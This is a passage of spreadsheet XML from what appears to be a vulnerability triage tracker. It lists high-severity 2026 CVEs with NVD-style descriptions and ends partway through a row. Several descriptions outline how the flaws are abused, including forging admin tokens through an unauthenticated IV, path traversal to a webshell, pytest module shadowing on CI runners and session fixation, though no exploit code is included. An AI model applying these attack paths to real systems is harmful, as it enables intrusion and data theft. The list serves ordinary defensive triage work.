    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C72" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28326</t>
        </is>
      </c>
      <c r="D72" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E72" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F72" s="5" t="inlineStr">
        <is>
          <t>psirt@solarwinds.com</t>
        </is>
      </c>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="inlineStr"/>
      <c r="I72" s="5" t="inlineStr"/>
      <c r="J72" s="5" t="inlineStr"/>
      <c r="K72" s="5" t="inlineStr"/>
      <c r="L72" s="5" t="inlineStr"/>
      <c r="M72" s="5" t="inlineStr"/>
      <c r="N72" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O72" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P72" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q72" s="5" t="inlineStr"/>
      <c r="R72" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="S72" s="5" t="inlineStr">
        <is>
          <t>SolarWinds Access Rights Manager was reported to be affected by an unauthenticated remote code execution vulnerability. The issue stems from a hardcoded static key.</t>
        </is>
      </c>
      <c r="T72" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28326</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C73" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54239</t>
        </is>
      </c>
      <c r="D73" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E73" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F73" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G73" s="5" t="inlineStr"/>
      <c r="H73" s="5" t="inlineStr"/>
      <c r="I73" s="5" t="inlineStr"/>
      <c r="J73" s="5" t="inlineStr"/>
      <c r="K73" s="5" t="inlineStr"/>
      <c r="L73" s="5" t="inlineStr"/>
      <c r="M73" s="5" t="inlineStr"/>
      <c r="N73" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O73" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P73" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q73" s="5" t="inlineStr"/>
      <c r="R73" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-639</t>
        </is>
      </c>
      <c r="S73" s="5" t="inlineStr">
        <is>
          <t>Faust.js is a headless WordPress toolkit. Prior to 1.8.11, the FaustWP WordPress plugin authenticates only the ciphertext in its token envelope and excludes the 16-byte initialization vector from the HMAC in WPE\FaustWP\Auth\encrypt() and WPE\FaustWP\Auth\decrypt() in plugins/faustwp/includes/auth/functions.php. A logged-in non-administrator who obtains an authorization code from GET /generate can modify the unauthenticated initialization vector so that CBC decryption changes the token type and user identifier while the HMAC remains valid. This can produce an access token for an Administrator and permit full WordPress REST API access, administrator-account creation, plugin installation, and arbitrary code execution. This issue is fixed in repository version 1.8.11.</t>
        </is>
      </c>
      <c r="T73" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54239</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C74" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54504</t>
        </is>
      </c>
      <c r="D74" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E74" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F74" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G74" s="5" t="inlineStr"/>
      <c r="H74" s="5" t="inlineStr"/>
      <c r="I74" s="5" t="inlineStr"/>
      <c r="J74" s="5" t="inlineStr"/>
      <c r="K74" s="5" t="inlineStr"/>
      <c r="L74" s="5" t="inlineStr"/>
      <c r="M74" s="5" t="inlineStr"/>
      <c r="N74" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O74" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P74" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q74" s="5" t="inlineStr"/>
      <c r="R74" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-668</t>
        </is>
      </c>
      <c r="S74" s="5" t="inlineStr">
        <is>
          <t>MCP Documentation Server is a local-first document management and semantic search server for AI coding agents. From 1.13.0 until 1.13.1, the automatically started Web UI in src/server.ts calls startWebServer in src/web-server.ts with START_WEB_UI enabled by default and WEB_PORT set to 3080. startWebServer uses app.listen(PORT) without a host, which binds the unauthenticated document-management API to all interfaces rather than localhost. A network-reachable client can invoke GET /api/documents, GET /api/documents/:id, POST /api/documents, POST /api/search-all, DELETE /api/documents/:id, and GET /api/config without credentials to enumerate and read documents, search the corpus, insert or delete documents, and tamper with the MCP assistant's knowledge base. The service must be reachable from the attacker's LAN, VM network, container bridge, VPN, or another routed network, and the issue does not provide remote code execution. This issue is fixed in 1.13.1.</t>
        </is>
      </c>
      <c r="T74" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54504</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C75" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54519</t>
        </is>
      </c>
      <c r="D75" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E75" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F75" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G75" s="5" t="inlineStr"/>
      <c r="H75" s="5" t="inlineStr"/>
      <c r="I75" s="5" t="inlineStr"/>
      <c r="J75" s="5" t="inlineStr"/>
      <c r="K75" s="5" t="inlineStr"/>
      <c r="L75" s="5" t="inlineStr"/>
      <c r="M75" s="5" t="inlineStr"/>
      <c r="N75" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O75" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P75" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q75" s="5" t="inlineStr"/>
      <c r="R75" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S75" s="5" t="inlineStr">
        <is>
          <t>AI Agent Automation is a modular AI agent workflow automation platform with schedulers, tools, and observability. Prior to 0.9.1, backend/src/controllers/memory.controller.js authenticates requests but listMemories, deleteMemory, and clearAgentMemory use a caller-supplied agentId or memory _id without verifying through the related Agent that the record belongs to req.user. An authenticated attacker who knows or obtains another user's identifiers can read victim AgentMemory content, including conversation history, agent context, task data, embeddings, and metadata, delete an individual victim memory, or clear all memory belonging to a victim agent. This breaks tenant isolation and causes unauthorized disclosure and data loss. This issue is fixed in version 0.9.1.</t>
        </is>
      </c>
      <c r="T75" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54519</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C76" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54612</t>
        </is>
      </c>
      <c r="D76" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E76" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F76" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G76" s="5" t="inlineStr"/>
      <c r="H76" s="5" t="inlineStr"/>
      <c r="I76" s="5" t="inlineStr"/>
      <c r="J76" s="5" t="inlineStr"/>
      <c r="K76" s="5" t="inlineStr"/>
      <c r="L76" s="5" t="inlineStr"/>
      <c r="M76" s="5" t="inlineStr"/>
      <c r="N76" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O76" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P76" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q76" s="5" t="inlineStr"/>
      <c r="R76" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-94</t>
        </is>
      </c>
      <c r="S76" s="5" t="inlineStr">
        <is>
          <t>Vvveb is a powerful and easy to use CMS with page builder to build websites, blogs or ecommerce stores. From 1.0.0 until 1.0.8.5, saveGlobalElements() in admin/controller/editor/global-trait.php concatenates the attacker-controlled file portion of data-v-save-global to the active theme directory before loadHTMLFile() and file_put_contents() operate on it. An authenticated user with the default Editor role and editor/* permission can submit crafted HTML to module=editor/editor&amp;action=save and traverse to an existing writable PHP file outside the theme directory. If the target is web-accessible, editor-controlled PHP content executes in the web server context; a shipped public/vadmin/index.php entrypoint can be used as an execution trampoline rather than requiring a test-only file. This can permit persistent webshell placement and compromise application confidentiality, integrity, and availability. This issue is fixed in version 1.0.8.5.</t>
        </is>
      </c>
      <c r="T76" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54612</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C77" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54671</t>
        </is>
      </c>
      <c r="D77" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E77" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F77" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G77" s="5" t="inlineStr"/>
      <c r="H77" s="5" t="inlineStr"/>
      <c r="I77" s="5" t="inlineStr"/>
      <c r="J77" s="5" t="inlineStr"/>
      <c r="K77" s="5" t="inlineStr"/>
      <c r="L77" s="5" t="inlineStr"/>
      <c r="M77" s="5" t="inlineStr"/>
      <c r="N77" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O77" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P77" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q77" s="5" t="inlineStr"/>
      <c r="R77" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="S77" s="5" t="inlineStr">
        <is>
          <t>WeGIA is a web manager for charitable institutions. Prior to 3.8.5, WeGIA maps InternoControle to an empty resource array in web/controle/control.php, and verificarPermissao in web/dao/MiddlewareDAO.php treats that empty array as unconditional access for every authenticated user. The methods in web/controle/InternoControle.php, including listarUm, alterar, and excluir, accept user-controlled id or idInterno values without verifying ownership, allowing a low-privileged user to read, modify, or delete another person's records and expose personal, identity, address, medical, and family information. The advisory notes that a self-referencing load bug can crash this controller in the reported revision, but the empty-resource authorization pattern and affected methods remain the vulnerability under review. This issue is fixed in version 3.8.5.</t>
        </is>
      </c>
      <c r="T77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54671</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C78" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54916</t>
        </is>
      </c>
      <c r="D78" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E78" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F78" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G78" s="5" t="inlineStr"/>
      <c r="H78" s="5" t="inlineStr"/>
      <c r="I78" s="5" t="inlineStr"/>
      <c r="J78" s="5" t="inlineStr"/>
      <c r="K78" s="5" t="inlineStr"/>
      <c r="L78" s="5" t="inlineStr"/>
      <c r="M78" s="5" t="inlineStr"/>
      <c r="N78" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O78" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P78" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q78" s="5" t="inlineStr"/>
      <c r="R78" s="5" t="inlineStr">
        <is>
          <t>CWE-427, CWE-829</t>
        </is>
      </c>
      <c r="S78" s="5" t="inlineStr">
        <is>
          <t>NetBox Device Type Library is a collection of community-sourced device type definitions for import into NetBox. The absence of tests/init.py and the lack of --import-mode=importlib cause pytest prepend import mode to place the tests directory at the front of sys.path during collection. An unauthenticated contributor can add a module such as tests/git.py that shadows GitPython when tests/definitions_test.py executes from git import Git, Repo, or add tests/conftest.py for automatic collection-time execution. Python imports and runs the pull-request module before any test function, allowing arbitrary code execution on the GitHub Actions runner, test-result tampering, and access to tokens or network resources exposed to the workflow. This module-shadowing path is independent of the earlier pickle deserialization flaw and the separately tracked NETBOX_DT_LIBRARY_URL issue. This vulnerability is fixed by commit b0d9a3dadd0a0a9d3c93b0b2777559fd4bad1037.</t>
        </is>
      </c>
      <c r="T78" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54916</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B79" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C79" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77614</t>
        </is>
      </c>
      <c r="D79" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E79" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F79" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G79" s="5" t="inlineStr"/>
      <c r="H79" s="5" t="inlineStr"/>
      <c r="I79" s="5" t="inlineStr"/>
      <c r="J79" s="5" t="inlineStr"/>
      <c r="K79" s="5" t="inlineStr"/>
      <c r="L79" s="5" t="inlineStr"/>
      <c r="M79" s="5" t="inlineStr"/>
      <c r="N79" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O79" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P79" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q79" s="5" t="inlineStr"/>
      <c r="R79" s="5" t="inlineStr">
        <is>
          <t>CWE-384</t>
        </is>
      </c>
      <c r="S79" s="5" t="inlineStr">
        <is>
          <t>Opencast is a free, open-source platform to support the management of educational audio and video content. Prior to versions 19.7 and 20.2, the default security configuration in etc/security/mh_default_org.xml accepts a client-selected JSESSIONID from the ;jsessionid= URL path parameter and does not replace it when the victim logs in. An unauthenticated attacker can send a crafted link to a victim whose browser has no active Opencast session cookie, wait for the victim to authenticate, and then reuse the known identifier as the victim's authenticated session. This can expose the victim's data and actions and can produce full administrative account takeover when the victim is an administrator. This issue is fixed in versions 19.7 and 20.2.</t>
        </is>
      </c>
      <c r="T79" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77614</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B80" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C80" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78295</t>
        </is>
      </c>
      <c r="D80" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E80" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F80" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G80" s="5" t="inlineStr"/>
      <c r="H80" s="5" t="inlineStr"/>
      <c r="I80" s="5" t="inlineStr"/>
      <c r="J80" s="5" t="inlineStr"/>
      <c r="K80" s="5" t="inlineStr"/>
      <c r="L80" s="5" t="inlineStr"/>
      <c r="M80" s="5" t="inlineStr"/>
      <c r="N80" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O80" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P80" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q80" s="5" t="inlineStr"/>
      <c r="R80" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S80" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Request Forgery (CSRF) in Xagio SEO &lt;= 7.1.0.43 versions.</t>
        </is>
      </c>
      <c r="T80" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78295</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B81" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C81" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85130</t>
        </is>
      </c>
      <c r="D81" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E81" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F81" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G81" s="5" t="inlineStr"/>
      <c r="H81" s="5" t="inlineStr"/>
      <c r="I81" s="5" t="inlineStr"/>
      <c r="J81" s="5" t="inlineStr"/>
      <c r="K81" s="5" t="inlineStr"/>
      <c r="L81" s="5" t="inlineStr"/>
      <c r="M81" s="5" t="inlineStr"/>
      <c r="N81" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O81" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P81" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q81" s="5" t="inlineStr"/>
      <c r="R81" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S81" s="5" t="inlineStr">
        <is>
          <t>The WPLP Cookie Consent  WordPress plugin before 4.4.4 does not escape a value submitted through a public endpoint for the JavaScript context it is later output in on an administrative screen, allowing unauthenticated users to run arbitrary JavaScript in the session of an administrator who interacts with the logged entry. Only multisite installations are affected.</t>
        </is>
      </c>
      <c r="T81" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85130</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B82" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C82" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86801</t>
        </is>
      </c>
      <c r="D82" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E82" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F82" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G82" s="5" t="inlineStr"/>
      <c r="H82" s="5" t="inlineStr"/>
      <c r="I82" s="5" t="inlineStr"/>
      <c r="J82" s="5" t="inlineStr"/>
      <c r="K82" s="5" t="inlineStr"/>
      <c r="L82" s="5" t="inlineStr"/>
      <c r="M82" s="5" t="inlineStr"/>
      <c r="N82" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O82" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P82" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q82" s="5" t="inlineStr"/>
      <c r="R82" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S82" s="5" t="inlineStr">
        <is>
          <t>The To Do List Member WordPress plugin from 1.4 through 1.6 ships a file upload endpoint that does not load WordPress and therefore applies no authentication, capability or nonce check of any kind, and validates only the name of an uploaded file rather than its content, allowing unauthenticated users to store active content served from the site's own origin, and to list and delete the files already staged there.</t>
        </is>
      </c>
      <c r="T82" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86801</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B83" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C83" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87786</t>
        </is>
      </c>
      <c r="D83" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E83" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F83" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G83" s="5" t="inlineStr"/>
      <c r="H83" s="5" t="inlineStr"/>
      <c r="I83" s="5" t="inlineStr"/>
      <c r="J83" s="5" t="inlineStr"/>
      <c r="K83" s="5" t="inlineStr"/>
      <c r="L83" s="5" t="inlineStr"/>
      <c r="M83" s="5" t="inlineStr"/>
      <c r="N83" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O83" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P83" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q83" s="5" t="inlineStr"/>
      <c r="R83" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S83" s="5" t="inlineStr">
        <is>
          <t>The Dewa Kirim  WordPress plugin through 1.0.0 does not escape delivery coordinates submitted at checkout before outputting them inside an inline script, allowing unauthenticated users to store JavaScript that runs in the session of an administrator who later opens the order.</t>
        </is>
      </c>
      <c r="T83" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87786</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B84" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C84" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88792</t>
        </is>
      </c>
      <c r="D84" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E84" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F84" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G84" s="5" t="inlineStr"/>
      <c r="H84" s="5" t="inlineStr"/>
      <c r="I84" s="5" t="inlineStr"/>
      <c r="J84" s="5" t="inlineStr"/>
      <c r="K84" s="5" t="inlineStr"/>
      <c r="L84" s="5" t="inlineStr"/>
      <c r="M84" s="5" t="inlineStr"/>
      <c r="N84" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O84" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P84" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q84" s="5" t="inlineStr"/>
      <c r="R84" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S84" s="5" t="inlineStr">
        <is>
          <t>The Dictionary WordPress plugin through 1.0 does not have authorisation, sanitisation or escaping in place when adding or updating dictionary entries, allowing unauthenticated users to store arbitrary web scripts which will execute when a user views an affected entry.</t>
        </is>
      </c>
      <c r="T84" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88792</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B85" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C85" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88904</t>
        </is>
      </c>
      <c r="D85" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E85" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F85" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G85" s="5" t="inlineStr"/>
      <c r="H85" s="5" t="inlineStr"/>
      <c r="I85" s="5" t="inlineStr"/>
      <c r="J85" s="5" t="inlineStr"/>
      <c r="K85" s="5" t="inlineStr"/>
      <c r="L85" s="5" t="inlineStr"/>
      <c r="M85" s="5" t="inlineStr"/>
      <c r="N85" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O85" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P85" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q85" s="5" t="inlineStr"/>
      <c r="R85" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S85" s="5" t="inlineStr">
        <is>
          <t>The PuppyFW WordPress plugin through 0.4.4 does not have proper authorisation on one of its REST routes, which tests the caller against a capability taken from the request itself, allowing any authenticated user, including subscribers, to add, modify and delete arbitrary blog options and thereby escalate their privileges.</t>
        </is>
      </c>
      <c r="T85" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88904</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B86" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C86" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92918</t>
        </is>
      </c>
      <c r="D86" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E86" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G86" s="5" t="inlineStr"/>
      <c r="H86" s="5" t="inlineStr"/>
      <c r="I86" s="5" t="inlineStr"/>
      <c r="J86" s="5" t="inlineStr"/>
      <c r="K86" s="5" t="inlineStr"/>
      <c r="L86" s="5" t="inlineStr"/>
      <c r="M86" s="5" t="inlineStr"/>
      <c r="N86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O86" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P86" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q86" s="5" t="inlineStr"/>
      <c r="R86" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="S86" s="5" t="inlineStr">
        <is>
          <t>admin3 through 3.0.0 persists user session tokens in the audit log event body when publishing UserLoggedIn domain events. Attackers with log:view permission can read the JSON response from the GET /logs endpoint to harvest session tokens and replay them as bearer credentials for full user access.</t>
        </is>
      </c>
      <c r="T86" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92918</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B87" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C87" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92970</t>
        </is>
      </c>
      <c r="D87" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E87" s="5" t="inlineStr">
